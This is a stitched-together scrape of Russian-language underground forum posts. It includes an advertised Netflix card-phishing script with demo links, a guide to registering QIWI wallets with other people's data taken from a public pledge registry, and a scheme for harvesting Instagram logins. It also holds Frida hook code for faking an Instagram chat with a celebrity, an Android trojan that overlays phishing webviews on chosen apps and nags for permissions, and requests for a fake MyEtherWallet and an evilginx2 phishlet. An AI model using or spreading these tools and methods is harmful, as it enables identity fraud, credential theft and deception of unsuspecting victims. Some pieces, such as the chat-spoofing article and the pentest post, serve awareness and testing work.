Охуевший напёрсточник поднимает глаза на "группу поддержки", они начинают двигаться в толпе к амбалу, но тут амбал и "хозяйские" быстро разворачиваются в "свинью", и каждый внимательно смотрит на "бойцов" напёрсточника, показывая, что для них нихуя не секрет, кто здесь кто, и с кем нужно драться. Толпа, понимая, чем пахнет, быстро сдаёт назад, и "бойцы" остаются посреди перрона как три тополя на Плющихе.
- И если бы, vdesyatke, это были мы с тобой, то нас бы с тобой там на месте и ушатали. Но этот дядька был не такой как мы.
Click to expand...
Старший "бойцов" смотрит на амбала, прикидывает свои шансы в прямом противостоянии против него, делает шаг назад, и качает головой напёрсточнику: "ну нахуй". Амбал смотрит на напёрсточника, тот снимает перстень и понуро отдаёт амбалу.
Сценарий кредитной карты Netflix
Demo https://bymajortest.com/
Demo-Admin:https://bymajortest.com/admin
password: xss
установка-install
Php версия 5.6 - Php version 5.6
baglan.php Fill in the database information - Заполните базу данных информацией
major.sql Phpmyadmin install
Virus Total
[Virustotal](https://www.virustotal.com/gui/file-
analysis/NzgyN2VjNTlmYWY0Y2JlODk3NWYyMjJmMzdmOTMzNzk6MTU4NTkxOTI0OA==/detection)
Download
Download
Всем привет,толчком на написание этой статьи является мое невезение в продажах QIWI-кошельков,и к тому же,что я хочу что-то сделать для вас всех! Я уже готов к оскорблениям,проклятиям и прочим унижениям со стороны владельцев крупных магазинов по продаже QIWI-кошельков, но для Вас я готов на это!
Давайте не будем обсуждать,то насколько данные действия хороши со стороны моральной этики,но одно я знаю точно,что все это показано,только в ознакомительных целях,и ни в коме случае не призывает вас делать,то что указанно в данной статье,ну и так же я хочу показать как Россия относится к персональным данным своих граждан.
Приступим к получению qiwi-кошелька со статусом "Основной"
1.1 Открываем мой любимый сайт реестра залогов <https://www.reestr-
zalogov.ru/search/index>
1.2 Нажимаем на кнопку "Найти в реестре", затем кнопку "По информации о
залогодатели", после "Физическое лицо"
1.3 Теперь вводим рандомные Имя и Фамилию,и нажимаем кнопку "Найти"
1.4 Тут мы видим много буковок и циферок
1.5 Теперь нажимаем на эти цифры, там будут данные.
Теперь мы переходим на сайт "QIWI" и входим или регистрируем(Если отсутствует)
2.1 Нажимаем на кнопку ввести вручную
2.2 Вводим данные
2.3 Вы получили "QIWI" со статусом "Основной"
I have created a google docs for osint links pls use it for reference
[ https://docs.google.com/document/d/15WQHWeA- wIm7mcMxA7UCvG5zBCT8Je4ypQo7JQmBmks/edit?usp=sharing ](https://docs.google.com/document/d/15WQHWeA- wIm7mcMxA7UCvG5zBCT8Je4ypQo7JQmBmks/edit?usp=sharing)
please mention your comments
Сегодня научу тебя создавать сетку из Инстаграм аккаунтов в своем городе, на которых в последствие сможешь пиарить заведения, акции, чьи-то услуги и еще кучу всего, предложения сами будут сыпаться, ты ж блин с крупной такой сеткой, может самой крупной в своем городе.
Как я это делал?
В инсте подписался на пару красивых мадам, пиcал им в директ нечто в духе:
Я: "Есть предложение, я раскручиваю аккаунты красивых девушек бесплатно"
Click to expand...
Тупая девка: "Хм, что за предложение и что нужно делать?"
Click to expand...
Я: "Твоя задача просто вести Инст, как и вела обычно, осилишь? Я в свою очередь буду бесплатно раскручивать твой акк, мне нужен опыт - тебе подписчики"
Click to expand...
Тупая девка: "Да"
Click to expand...
Я: "Так как для раскрутки мне нужен будет доступ к аккаунту, то мы получаем два варианта. Первый - я создаю тебе аккаунт, даю логин и пароль и ты ведешь его, если ты боишься давать основной, ты ничего не теряешь при этом. Второй
- ты просто даешь доступ к своему акку - Логин:пасс"
Click to expand...
На второй вариант тупая девка не согласится в 90% случаев. Внезависимости от ее выбора, как ни странно начинаем раскручивать.
Раскрутка
Все делаем по старинке через Mass Follow, это подписка по списку аудитории.
Для этого вот тебе программа - LeonGram, ни рефок, ничего, не ссы, для 1 аккаунта она бесплатная, но я бы раскошелился на про версию, всего 500 рублей, зато акков сколько влезет, нужно будет только на каждые 3 аккаунта покупать прокси, на proxy6.net они по 69 рублей, обычно беру там.
Учить тебя собирать аудитории и тд я не буду по кнопочкам, все интуитивно понятно, да и гайдов пруд пруди, да и ты парень смышленый - справишься.
Совет
Аудиторию сначала собирай по месту, потом по своим же подписчикам с города, просто парси их подписки, чаще всего это и есть люди с твоего города или те, кто с ним как-либо связаны. Можно еще себе аккаунт подкрутить слегка, ну так, чтобы красиво было.
В среднем 1 аккаунт за месяц набирает около 2-3к подписчиков, все зависит от качества аудитории, которую ты соберешь. Думаю осилишь все 5к.
Аккаунтов я брал 12, да, сложно, но ничего. Аудиторию лучше не мешать, но меня это всегда мало волновало, брали и так.
Конверсия у данного аккуанта порядка 20%, так как девушка сама ведет его, свежие живые фотки, даже с контентом париться не надо, даже если у тебя не купят рекламу или ты не сможешь ее продать у тебя останется куча инст аккаунтов, которые ты всегда успеешь слить рублей по 500-1000 за штуку.
Какие минусы в этой теме?
Лично я задолбался каждый раз с утра парсить аудитори, после ставить все это на подписку и так по кругу, все быстро надоедает, но ты держись, деньги то близко.
Девушки существа капризные, порой приходилось слегка пинать их, дабы был контент, сторис и прочее.
Как искать рекламодателей?
У каждого заведения в городе как и у человека есть аккаунты в социальных сетях. Гуглите заведения своего города, почти у каждого там указаны ссылки их аккаунтов в социальных сетях, там пишите по контактам и предлагаете услуги рекламы их заведения у вас в инстаграм сетке. Не забудьте подготовить красиво оформленный пост-прайс. Заведения будут хорошо соглашаться. Потому что аудитория у вас будет свежая и активная, я удивился, но при 2к подписок у девок, спокойно набирается по 500-700 лайков.
Так же можно рекламировать инстаграм аккаунты других людей за деньги, тоже активно покупали рекламу.
Итоги
Уже за первый месяц работы, имея еще маленькие аккаунты по меркам инстаграм на
рекламе заведений, слива на пп + доп услугах по раскрутке я зарабатывал 50
тысяч рублей, с каждым месяцем аккаунты росли и приносили больше денег, через
пару мес я вышел на 100 тысяч рублей. Все зависит от твоего усердия.
Всем профитов, друзья!
Чтобы подделать screenlife, не нужно ни больших бюджетов, ни спецэффектов, ни навыков видеомонтажа. Все, что нужно, — это фреймворк инструментации Frida, небольшой скрипт на JavaScript и один реверсер. Да, не нужно машинного обучения, нейронных сетей и тяжелой артиллерии вроде DeepFace.
Техническая сторона вопроса, или пара слов о Frida
Frida — это фреймворк динамической бинарной инструментации (Dynamic Binary
Instrumentation, DBI),
позволяющий в runtime добавлять пользовательский JavaScript код внутрь
исполняемого blackbox процесса / приложения с целью его дальнейшего изучения —
hooking и tracing кода приложения, подмена аргументов и возвращаемых значений
функций, изменение их поведения и многое другое. Подробнее с возможностями
Frida можно ознакомиться на официальном сайте. Frida
доступна для многих платформ, в том числе и для iOS.
Пример/proof
Устройство : iPhone 6s с версией iOS 13.2.3
Целевое приложение : Instagram (v126.0.0.13.120)
Цель : Продемонстрировать переписку с очень известной личностью, в нашем
случае с Мадонной.
Сразу оговоримся, что можно взять абсолютно любое устройство под любой ОС.
Целевое приложение тоже может быть любым — от новостных до мобильного
банкинга.
TL;DR
Что мы хотим получить
Ниже продемонстрирован конечный результат описанной задачи:
Для написания и отладки скрипта мы используем устройство с jailbreak, а финальный результат можно будет запускать и на устройстве без него.
Прежде всего, нужно понять, как должно выглядеть приложение после запуска скрипта. Какие UI элементы должны быть изменены, чтобы создать видимость правдивой переписки? Для этого взглянем на стандартный UI интерфейс Instagram:
Так выглядит профиль пользователя Madonna (на момент написания статьи):
Если открыть личные сообщения с Мадонной, то увидим пустой диалог (что
ожидаемо):
Также пример непустого диалога с пользователем (состоящий просто из рандомных
предложений):
Таким образом, открывая сообщения с Мадонной (назовём её origUser — original User), мы должны попасть в диалог с другим пользователем (назовём его replUser — replicated User), где все UI элементы будут заменены на те, что находятся в диалоге с origUser (верхний бар, аватар у сообщений). При этом сам диалог должен вестись с replUser, который контролируется нами, например, через второй аккаунт. Кроме того, хочется сделать скрипт универсальным, чтобы на месте Мадонны мог быть любой пользователь. Как мы увидим далее, для этого будет достаточно ID origUser и replUser, которые публично известны, и могут быть легко получены.
Получаем дешифрованный IPA файл
Итак, чтобы начать разработку Frida-скрипта, нам нужно дешифрованное целевое
приложение (в данном случае IPA файл приложения Instagram). Получить его можно
несколькими способами:
Получив файлы приложения, можно приступать к ревёрсу. Про иерархию директорий и файлов iOS bundle можно почитать на официальном сайте разработчиков. В нашем случае можно найти три интересных исполняемых Mach-O 64-bit arm64 файла:
Ревёрсим исполняемые файлы (Instagram)
Сперва посмотрим на код самого приложения — Insagram.App/Instagram.
Использовать для этого можно различные инструменты для дизассемблирования, в
нашем случае использовалась IDA Pro.
Просмотрев функции бинарного файла Instagram, можно заметить, что их
сравнительно мало (всего 364), хотя Instagram — довольно обширное приложение:
Большая часть этих функций — импорты из фреймворков. Поэтому далее имеет смысл
смотреть функционал фреймворков, упомянутых выше.
Ревёрсим исполняемые файлы (InstagramAppCoreFramework и FBSharedFramework)
Далее мы будем работать с InstagramAppCoreFramework, содержащим основную
логику приложения Instagram.
Поверхностный анализ фреймворков показал, что FBSharedFramework является перемычкой между Instagram и InstagramAppCoreFramework, содержащей классы (User, Direct Messages, Message итд), controller и view к которым реализуются в InstagramAppCoreFramework.
Click to expand...
Попробуем для начала найти код, ответственный за direct сообщения. Нам это понадобится, чтобы по нажатию на кнопку “Message” в профиле origUser, попасть в direct с replUser.
Doxygen документация по хедерам
Открыв InstagramAppCoreFramework в IDA Pro, мы видим, что в нём по меньшей мере 250000 функций, а значит, искать нужную логику вслепую будет довольно долго. Чтобы ускорить процесс ревёрс-инжиринга, можно сгенерировать doxygen- документацию на основе header-файлов Objective-C классов этого фреймворка. Для генерации header-файлов можно использовать утилиту classdumpios, поддерживающую архитектуру ARM64. Имея iPhone с jailbreak, можем зайти на него через SSH по USB и в директории с уже распакованным IPA файлом Instagram сделать следующее:
Code:Copy to clipboard
iPhone:~/insta $ mkdir headers
iPhone:~/insta $ cp Payload/Instagram.app/Frameworks/InstagramAppCoreFramework.framework/InstagramAppCoreFramework ./headers
iPhone:~/insta $ cp Payload/Instagram.app/Frameworks/FBSharedFramework.framework/FBSharedFramework ./headers
iPhone:~/insta $ cd headers
iPhone:~/insta/headers $ classdumpios -H InstagramAppCoreFramework -o IG_headers
iPhone:~/insta/headers $ classdumpios -H FBSharedFramework -o FB_headers
iPhone:~/insta/headers $ tar -czvf IG_headers.tar.gz IG_headers
iPhone:~/insta/headers $ tar -czvf FB_headers.tar.gz FB_headers
Теперь осталось скачать архивы с header-файлами из iPhone на хостовую машину, разархивировать их в одну директорию, создать соответствующий конфигурационный файл для doxygen и запустить генерацию документации:
Code:Copy to clipboard
Host@Host:~/insta$ mkdir docs && cd docs
Host@Host:~/insta/docs $ scp -P <PORT> root@<IP>:</path/to/instagram>/insta/headers/IG_headers.tar.gz .
Host@Host:~/insta/docs $ scp -P <PORT> root@<IP>:</path/to/instagram>/insta/headers/FB_headers.tar.gz .
Host@Host:~/insta/docs $ tar xf IG_headers.tar.gz
Host@Host:~/insta/docs $ tar xf FB_headers.tar.gz
Host@Host:~/insta/docs $ cp </path/to/dox.template> .
Host@Host:~/insta/docs $ doxygen dox.template
Когда doxygen-документация сгенерирована, можно смотреть на отношения между классами и их иерархию. При анализе больших файлов это упрощает жизнь.
Вот небольшой кусочек списка классов, участвующих в InstagramAppCoreFramework
и FBSharedFramework:
И пример того, как выглядит описание рандомно взятого класса IGAuthUserParser:
С помощью такой документации перемещаться по классам, их методам и полям становится в разы проще.
Первый Frida-скрипт
В процессе анализа исполняемого файла вы наверняка найдёте интересную функцию,
которая может участвовать в необходимой логике. Чтобы проверить это
предположение, но при этом не ревёрсить статически все внутренние и внешние
вызовы функции, можно с помощью простого Frida-скрипта проверить,
действительно ли функция срабатывает, с какими аргументами была вызвана, какое
возвращаемое значение, какой backtrace, состояние стека на момент вызова и так
далее. При желании вы даже можете подменять возвращаемое значение или
полностью заменить логику функции. Всё зависит от ваших нужд. Далее мы опишем
только trace-скрипт, который следит за вызовами функции и показывает
интересующую нас отладочную информацию.
Прежде всего необходимо установить Python-биндинг для Frida, а также вспомогательные утилиты:
Code:Copy to clipboard
~ $ pip install --upgrade frida frida-tools
Подразумевается, что к этому моменту на тестируемом устройстве уже поднят frida-server. О том, как это сделать, можно прочитать [тут (для устройств с JB)](https://resources.infosecinstitute.com/ios-application-security- part-47-inspecting-apps-with-frida/#gref) или [тут (для устройств без JB)](https://medium.com/@dinezh.shetty/setting-up-frida-without-jailbreak-on- devices-running-latest-ios-12-4-27c7cfa6c9a2).
В качестве примера мы будем использовать метод - inputView:didTapStickerButton: класса IGDirectThreadViewController. Почему именно он? Забежим немного вперёд и представим, что уже провели некоторый анализ исполняемого файла, и нас заинтересовала эта функция. Хочется понять, действительно ли она вызывается при нажатии на кнопку стикеров внутри direct сообщений (на самом деле, этот класс взят не случайно, он используется далее в работе). Сейчас можно считать, что это просто рандомная функция, которая для нас ничего не значит, ведь мы просто хотим показать, как работать с функционалом Frida. Для начала получим NativeFunction этого метода:
Code:Copy to clipboard
var func = ObjC.classes.IGDirectThreadViewController["inputView:didTapStickerButton:"].implementation;
Затем поставим hook, срабатывающий на вход и выход из функции:
Code:Copy to clipboard
Interceptor.attach(func, {
onEnter: function(args) {
console.log("-[IGDirectThreadViewController inputView:didTapStickerButton:] => onEnter");
},
onLeave: function(retval) {
console.log("-[IGDirectThreadViewController inputView:didTapStickerButton:] <= onLeave");
}
}
В итоге получился максимально простой скрипт, который выводит сообщения на вход и выход из функции.
Уже этого скрипта будет достаточно, чтобы понять, выполняется ли та или иная функция. Но, разумеется, нам нужен более детальный анализ, поэтому внесём некоторые улучшения.
В hook, срабатывающий на вход, добавим вывод названий аргументов, их значений и бектрейс. А в hook на выход — возвращаемое значение. Большая часть кода позаимствована [отсюда](https://codeshare.frida.re/@mrmacete/objc-method- observer/). В итоге получим такую функцию:
Code:Copy to clipboard
function addTracer(className, methodName) {
// Получаем NativeFunction по методу класса
var impl = ObjC.classes[className][methodName].implementation;
Interceptor.attach(impl, {
onEnter: function(a) {
this.log = []; // Логи, которые будут выводиться на выходе из функции
this.log.push('(' + a[0] + ',' + Memory.readUtf8String(a[1]) + ') ' + className + ' ' + methodName); // Логируем адрес функции, её название и класс, к которому она относится
if (methodName.indexOf(':') !== -1) { // Далее парсим аргументы, разделённые ":"
var params = methodName.split(':');
params[0] = params[0].split(' ')[1];
// Складываем названия аргуметов с соответствующими значениями
for (var i = 0; i < params.length - 1; i++) {
try {
this.log.push(params[i] + ': ' + new ObjC.Object(a[2 + i]).toString());
} catch (e) {
this.log.push(params[i] + ': ' + a[2 + i].toString());
}
}
}
// Добавляем бектрейс до текущей функции
this.log.push(
Thread.backtrace(this.context, Backtracer.ACCURATE)
.map(DebugSymbol.fromAddress)
.join('\n')
);
},
onLeave: function(r) {
// И, наконец, возвращаемое значение
try {
this.log.push('RET: ' + new ObjC.Object(r).toString());
} catch (e) {
this.log.push('RET: ' + r.toString());
}
console.log(this.log.join('\n') + '\n');
}
});
}
Использовать полученную функцию можно таким образом:
Code:Copy to clipboard
addTracer("IGDirectThreadViewController", "- inputView:didTapStickerButton:");
Чтобы запустить полученный скрипт, нужно выполнить следующую команду (с запущенным Frida-сервером на тестируемом устройстве, подключенном по USB):
Code:Copy to clipboard
$ frida -U -n Instagram -l </path/to/script> --no-pause
После запуска скрипта заходим в direct сообщения с пользователем и нажимаем на кнопку со стикерами (расположены справа от поля для ввода сообщения). Мы получем исчерпывающий вывод:
Code:Copy to clipboard
(0x1269aea00,inputView:didTapStickerButton:) IGDirectThreadViewController - inputView:didTapStickerButton:
inputView: <IGDirectComposer: 0x125d241b0; frame = (0 607; 375 60); text = ''; autoresize = H; layer = <CALayer: 0x281ef5fc0>>
didTapStickerButton: <IGDirectComposerButton: 0x127a5e210; baseClass = UIButton; frame = (319 10; 24 24); opaque = NO; tintColor = <UIDynamicProviderColor: 0x281e29dc0; provider = <__NSMallocBlock__: 0x2810cfdb0>>; layer = <CALayer: 0x281e37900>>
0x1072df1dc InstagramAppCoreFramework!IGHandleURLForIGInstagramToast
0x18743bab0 UIKitCore!-[UIApplication sendAction:to:from:forEvent:]
0x186e738ac UIKitCore!-[UIControl sendAction:to:forEvent:]
0x186e73c10 UIKitCore!-[UIControl _sendActionsForEvents:withEvent:]
0x186e72c2c UIKitCore!-[UIControl touchesEnded:withEvent:]
0x1019378ac FBSharedFramework!IGCrashReportProcessorLatestUploadError
0x187475288 UIKitCore!-[UIWindow _sendTouchesForEvent:]
0x1874765c8 UIKitCore!-[UIWindow sendEvent:]
0x187452b78 UIKitCore!-[UIApplication sendEvent:]
0x1012e0784 FBSharedFramework!IGALLoggerSetTrackingNodeForView
0x1874caef8 UIKitCore!__dispatchPreprocessedEventFromEventQueue
0x1874cd454 UIKitCore!__handleEventQueueInternal
0x1874c62c8 UIKitCore!__handleHIDEventFetcherDrain
0x18334f7c4 CoreFoundation!__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__
0x18334f71c CoreFoundation!__CFRunLoopDoSource0
0x18334eeb4 CoreFoundation!__CFRunLoopDoSources0
RET: nil
Поиск и анализ direct чата
Сразу оговоримся, что дальнейшее описание относится к указанной версии
Instagram. Мы не гарантируем работу скрипта для других версий.
В Instagram за direct сообщения (как личные сообщения, так и чаты) отвечает класс IGDirectThread (далее "direct сообщения ", "direct thread ", "диалог " можно считать одной и той же сущностью).
Если посмотреть на поля этого класса, то можно найти строку, идентифицирующую
конкретный direct thread — _threadId. У каждого диалога есть свой уникальный
ID. В дальнейшем мы воспользуемся этими данными. Если вы всё же сгенерировали
документацию, то можете самостоятельно поизучать методы и поля, относящиеся к
direct сообщениям, это затягивает.
Также стоит отметить поле _metadata. Внутри объекта этого класса хранится список пользователей (поле _users), относящихся к этому direct thread.
За объекты пользователей отвечает класс IGUser. Он довольно большой, поэтому освещать его целиком мы не будем. Отметим лишь поле _pk, которое является уникальным идентификатором пользователя. Найти _pk можно на публичных ресурсах, например, [тут](https://codeofaninja.com/tools/find-instagram-user- id)
Класс, соединяющий UI и IGDirectThread, — IGDirectThreadViewController будет опорной точкой дальнейшего анализа, так как в нём содержатся все вспомогательные элементы, необходимые для достижения результата. Это большой класс со множеством методов и полей — как своих, так и наследованных.
По логике вещей, при открытии direct сообщений создается и инициализируется объект класса IGDirectThreadViewController. Попробуем сперва посмотреть на функции, отвечающие за инициализацию объекта. Наше внимание привлёк метод -[IGDirectThreadViewController initWithUserSessionhread:entryPoint:perfComponents:]. Если поставить указанный выше вспомогательный Frida-hook на эту функцию, то можно увидеть, как она вызывается при открытии нового диалога. Проанализировав логику функции, можно заметить создание вспомогательных объектов для контроллера и дальнейшую инициализацию созданного объекта IGDirectThreadViewController:
Одним из ключевых объектов для инициализации является передаваемый аргумент функции IGDirectThread. Как мы уже знаем, IGDirectThread относится, в частности, к direct сообщениям с пользователем, поэтому контролирование этого аргумента может сыграть нам на руку.
Подмена direct чата
Таким образом, перенося вышесказанное на поставленную задачу, получаем
следующий алгоритм: если открывается диалог с origUser, то заменяем объект
IGDirectThread на тот, что относится к replUser. Но перед этим необходимо
найти в памяти процесса Instagram диалоги, относящиеся к origUser и replUser
соответственно. Способов сделать это несколько. Один из них — зная _pk
пользователя, найти IGDirectThread, содержащий в поле _users (которое
находится в _metadata) пользователя с указанным _pk. Другой способ — в ещё
одном hook находим _threadId для определённого пользователя (например, при
открытии нового диалога), а затем находим direct thread по этому ID.
В коде ниже реализован первый вариант, так как он требует меньше времени на поиск direct thread — не нужно проходить все объекты IGDirectThread в памяти, достаточно лишь сравнить открываемые direct сообщения с теми, что нам нужны (наличие пользователя в поле _users):
Code:Copy to clipboard
var IGDirectThreadViewControllerInitWithUserSession = ObjC.classes.IGDirectThreadViewController["- initWithUserSession:thread:entryPoint:perfComponents:"].implementation;
Interceptor.attach(IGDirectThreadViewControllerInitWithUserSession, {
onEnter: function(args) {
this.thread = new ObjC.Object(args[3]);
/**
* origUser и replUser - глобальные переменные, в которых хранится
* необходимая информация о пользователе
*
* Если текущий открываемый direct thread предназначается для одного из
* наших пользователей (origUser или replUser), то
* копируем его и сохраняем
*/
[origUser, replUser].forEach(function (user) {
var users = this.thread.$ivars["_metadata"].$ivars["_users"];
if (users.count() == 1 && users.objectAtIndex_(0).$ivars["_pk"] == user.pk && user.thread == undefined) {
user.thread = this.thread.retain();
}
}, this);
/**
* По крайней мере мы должны знать threadId обоих пользователей, чтобы
* производить замену диалогов
*/
if (origUser.threadId == undefined || replUser.threadId == undefined) {
return;
}
/* Проверяем, открывается ли thread с `origUser` */
if (this.thread.$ivars["_threadId"].equals(origUser.threadId)) {
/**
* Если да, то подменяем передаваемый IGDirectThread на тот,
* что соответствует `replUser`
*/
args[3] = replUser.thread.retain();
/**
* Эта переменная нужна для дополнительной логики, про которую будет
* сказано далее
*/
replaceState = true;
console.log(
FgGreen + "[+]" + Reset +
" Thread " +
origUser.threadId +
" spoofed with " +
replUser.threadId +
"!"
);
}
}
});
Загрузив полученный Frida-скрипт (необходимо лишь собрать недостающую информацию, упомянутую выше) и открыв direct сообщения с origUser, мы откроем диалог с replUser! А это именно то, чего мы хотели. Теперь нужно разобраться с верхним баром и аватаркой пользователя.
Изменяем верхний бар
Посмотрев на объект IGDirectThreadViewController в runtime, можно найти
интересное поле — _viewModel. Чем же оно примечательно? Посмотрев на структуру
класса IGDirectThreadViewControllerViewModel, можно найти внутреннее поле
_leftAlignedTitleViewModel и, пройдя вглубь
_leftAlignedTitleViewModel->_titleButton->_titleView->text, увидеть название
текущего диалога, расположенного в баре (т.е. имя пользователя, с которым
открывались direct сообщения). Что произойдёт, если взять _viewModel,
создаваемую для origUser (без подмены диалогов), создать копию этого объекта и
заменить после инициализации direct сообщений с origUser (учитывая, что
подмена диалогов уже работает)?
Такой подход сработает, но только частично. При нажатии на бар будет открываться профиль origUser — то, чего мы и добивались. Но при новом сообщении от replUser верхний бар обновится и вернётся в состояние для replUser. Таким образом, происходит обновление верхнего бара — функция -[IGDirectViewController _updateThreadNavigationBar]. Можем производить замену бара в вызове этой функции. Теперь при открытии direct сообщений с origUser открывается диалог с replUser, верхний бар которого принадлежит origUser, и новые сообщения не влияют на его обновление.
Code:Copy to clipboard
var IGDirectThreadViewControllerUpdateNavigationBar = ObjC.classes.IGDirectThreadViewController["- _updateThreadNavigationBar"].implementation;
Interceptor.attach(IGDirectThreadViewControllerUpdateNavigationBar, {
onLeave: function(retval) {
/**
* Если мы сейчас находимся в состоянии подмены пользователя, и при этом
* текущий контроллер от replUser, то заменяем viewModel. Тут нужно
* понимать, что подмена диалогов уже работает, и после открытия direct сообщений
* с origUser мы работаем с direct сообщениями replUser.
*/
if (replaceState && this.controller.$ivars["_threadId"].equals(replUser.threadId)) {
this.controller.$ivars["_viewModel"] = origUser.viewModel.retain();
}
if (DEBUG) console.log("IGDirectThreadViewController[onLeave]: -_updateNavigationBar");
}
});
Теперь осталась только аватарка.
Замена аватарки
Это наиболее простая операция — в объекте класса IGUser есть поле под
названием _profilePicURL. При входе в direct сообщения с origUser будем
заменять аватарку replUser на origUser, а при выходе из диалога производить
обратную замену. Обратная замена нужна только для того, чтобы не испортить
аватарку подменяемому пользователю.
Код для этого функционала оставляем читателю в качестве домашнего задания.
Небольшие проблемы
Эта реализация имеет ряд проблем, которые могут привести к падению приложения
и некоторым другим глюкам. Мы не ставили задачи написать production-ready
скрипт, а этой реализации достаточно, чтобы записать небольшую демку,
показывающую изначальную задумку.
Весь скрипт занимает около 350 строк на JavaScript с учётом всех возникших проблем. Для более сложной логики он, конечно, будет больше — тут уже дело в вашей фантазии
Взгляд в будущее
Можно с ужасом представить, что будет, когда до широких масс дойдет
дополненная реальность (AR), которая для телефонов сейчас в основном
представлена в виде развлекательных масок и небольших игрушек.
Заключение
Когда вас в следующий раз будут в чем-то убеждать и показывать переписку со звездой в популярном мессенджере или круглые цифры в мобильном банкинге — не спешите этому верить
Источник: dsec.ru/blog/poddelka-screenlife-da-ya-madonnu-lichno-znayu/
Ищу вот такой фейк MyEtherWallet.com
Функционал:
В прошлом году сливали в паблик, но сейчас все линки дохлые. если у кого-то осталось, залейте, поделитесь
Вечер добрый, хочу добавить немного зла в этот мир. В общем, я написал софт который во время запуска определённого приложения, подменяет его и открывает webview с нужной нам интернет страницей.
Я дам вам apk, в нём необходимо модифицировать ресурсы с помощью апк эдитора, я положил его в архив(обратите внимание это не оригинальный apkEditor, а модификация. Я нашёл его на одном русскоязычном форуме, мод исправляет отображение массивов). Ниже я приведу подробную инструкцию, по редактированию ресурсов через ApkEditor, вы можете попробовать проделать тоже самое через apktool, но лично у меня ничего, apktool не хочет собирать apk обратно.
Инструкция
res/values/arrays.xml
com.android.example
" на имя нужного нам
пакета (имя пакета можно узнать через ApkEditor или PlayMarket), также меняем
"http://my.server
" на адрес любого веб сайта.Демонстрация
После открытия, наш троян с определённым временным интервалом будет под разными предлогами выпрашивать права.
Текст сообщения можно изменить, в ресурсах /res/values/strng.xml
(также
можно поменять название приложения).
Ну собственно запуск:
Spoiler: Gif
Возможности
Spoiler: Код под спойлером
XML:Copy to clipboard
<string-array name="prog_list">
<item>com.vkontakte.android</item>
<item>ru.fourpda.client</item>
</string-array>
<string-array name="server_addr">
<item>http://192.168.0.20/</item>
<item>http://yandex.ru</item>
</string-array>
Косяки
Я мало уделял внимания тестированию, а весь код состоит из костылей и чёрной магии, следовательно багов будет много
УХ!!! Api, это звучит гордо!! на самом деле есть всего две функии, которые может выполнить веб сервер
Code:Copy to clipboard
<script type="text/javascript">JAVA.SetNavigationBarColor('#528bcc')</script>
Данный скрипт меняет цвет NavigationBar-a цвет указывайте вместо #528bcc
Code:Copy to clipboard
<script>JAVA.OK()</script>
Выполнив данный скрипт фишинг для данного приложения прекращается и начинается отслеживание следующего приложения в очереди.
Опишите то чего вам здесь не хватает, до тех пор пока я не забил, могу что нибуть реализовать
Буду рад услышать ваши отзывы идеи, предложения, оскорбления и угрозы. если что не понятно пишите попробую объяснить.
P.S. Прошу прощения за совершённые мной орфографические ошибки, данная статья писалась поздно ночью, сейчас уже утро, моя голова не работать, слабая плоть
Софт работает на Android 6+(если комуто надо могу запустить на Android 5.1)
Кто скачал, будьте добры отпишите: Всё ли работает и на чём тестируете. Я очень не уверен в коде отвечающем за закрытие приложения. Так же сам процесс может умирать, я не знаю как обстоят дела с китайцами.
Автор @Napalm
источник codeby
It is possible to bypass google reCapthca with evilginx2? I want to make a phishlet for Airbnb but I can't figure out how to verify google reCaptcha. I tried every possible option
I don't know if it is permitted to post in English here (if not please delete thread).
Во многих случаях, успешные социальные инженеры обладают сильными человеческими качествами. Они очаровательны, вежливы и просты — социальные качества, необходимые для установления быстрой связи и доверия.
Кевин МитникClick to expand...
Проверка осведомленности персонала об ИБ-угрозах является одним из самых востребованных кейсов. Проводится она, как правило, методами социальной инженерии.
Данный пост написан мной в соавторстве с коллегами Перспективного мониторинга на основании реальных кейсов, отработанных нашей рабочей группой на практике.
Цель: проверка соблюдения сотрудниками политик ИБ.
Методы: социальная инженерия.
Локальная цель: получение информации, которая позволит реализовать атаку
«повышение привилегий».
Этапы проведения социалки мало чем отличаются от этапов пентеста.
Планирование
Главное в социалке — поставить четкую цель. Без целеполагания, действуя хаотично, вы мало чего добьетесь, только превратите социалку в балаган, а себя в клоунов.
Ставим цель: выйти на системного администратора и добиться у него информации по структуре учетной записи, структуре пароля, в идеале — получить сам пароль.
Сбор и анализ информации
Это самый длительный и нудный этап. Глазами неосведомленного человека работа социального инженера состоит из телефонных разговоров, во время которых он силой магии, таланта и обаяния выуживает у доверчивых пользователей конфиденциальную информацию. В реальности сбор информации/переговоры соотносятся как многодневные изматывающие тренировки/выступление на чемпионате у спортсмена.
Что нам необходимо: максимально полная информация о сотрудниках атакуемой компании. А именно: ФИО, должности, контакты, полномочия. Важнейшая информация — используемые в компании технологии. Также необходима информация о самой компании: положение на рынке, финансовое состояние, слухи, сплетни (последнее — особенно интересно, т.к. раскрывает неформальную обстановку в компании).
Чем пользуемся: сайт организации, сбор информации по открытым источникам, фишинг, какую-то информацию может предоставить заказчик.
Фишинг — идеальное решение, но для вайтхакера не всегда возможное с точки зрения договора с заказчиком. Подготавливаем письмо, содержащее вредоносное вложение или ссылку на фишинговый сайт. Цель — получить реальные учетные данные пользователей.
Чтобы фишинговое письмо попало точно в цель, необходимо тщательно изучить информацию о компании и ее специфику. Какие именно технологии используются в компании? Где находится офис? Какие бонусы предлагают сотрудникам? Какие проблемы есть у компании?
Пример фишингового письма:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fc-%2Fqi%2Fwv%2Fc- qiwvsux850qz3juqtvyolajuo.jpeg&hash=98d75031e5edeaa5272d8ab61a20630d)
Можно сделать несколько писем, каждое из которых ориентировано на свою целевую группу.
Заказчик против фишинга? Ок, вооружаемся терпением и просеиваем открытые источники: работные сайты, сайты отзывов, соцсети, блоги, форумы, тематические группы. Приготовьтесь убить несколько дней на занудную и часто неблагодарную работу.
Сбор информации из публичных источников вручную — занятие трудоемкое. Поскольку одним из продуктов, разрабатываемых нашей компанией, является комплекс сбора данных по открытым источникам, у нас данный этап занимает небольшое количество времени, т.к. все делается достаточно быстро, связи между объектами интереса выстраиваются автоматически.
Схема дружеских отношений реального аккаунта. Фото заменены.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fg5%2F8r%2Fg9%2Fg58rg9hm- cn63--sxl__m4s1jik.jpeg&hash=568e5b3a2f1ac0188847e1ba0b38d504)
Финальным итогом этапа может быть следующее:
Эксплуатация уязвимостей
Из всех пользователей нам надо выбрать несколько жертв: тех, кому мы звоним, и тех, от лица кого мы звоним. Продумать их связи, на основании анализа аккаунтов соцсетей написать предполагаемый психологический портрет.
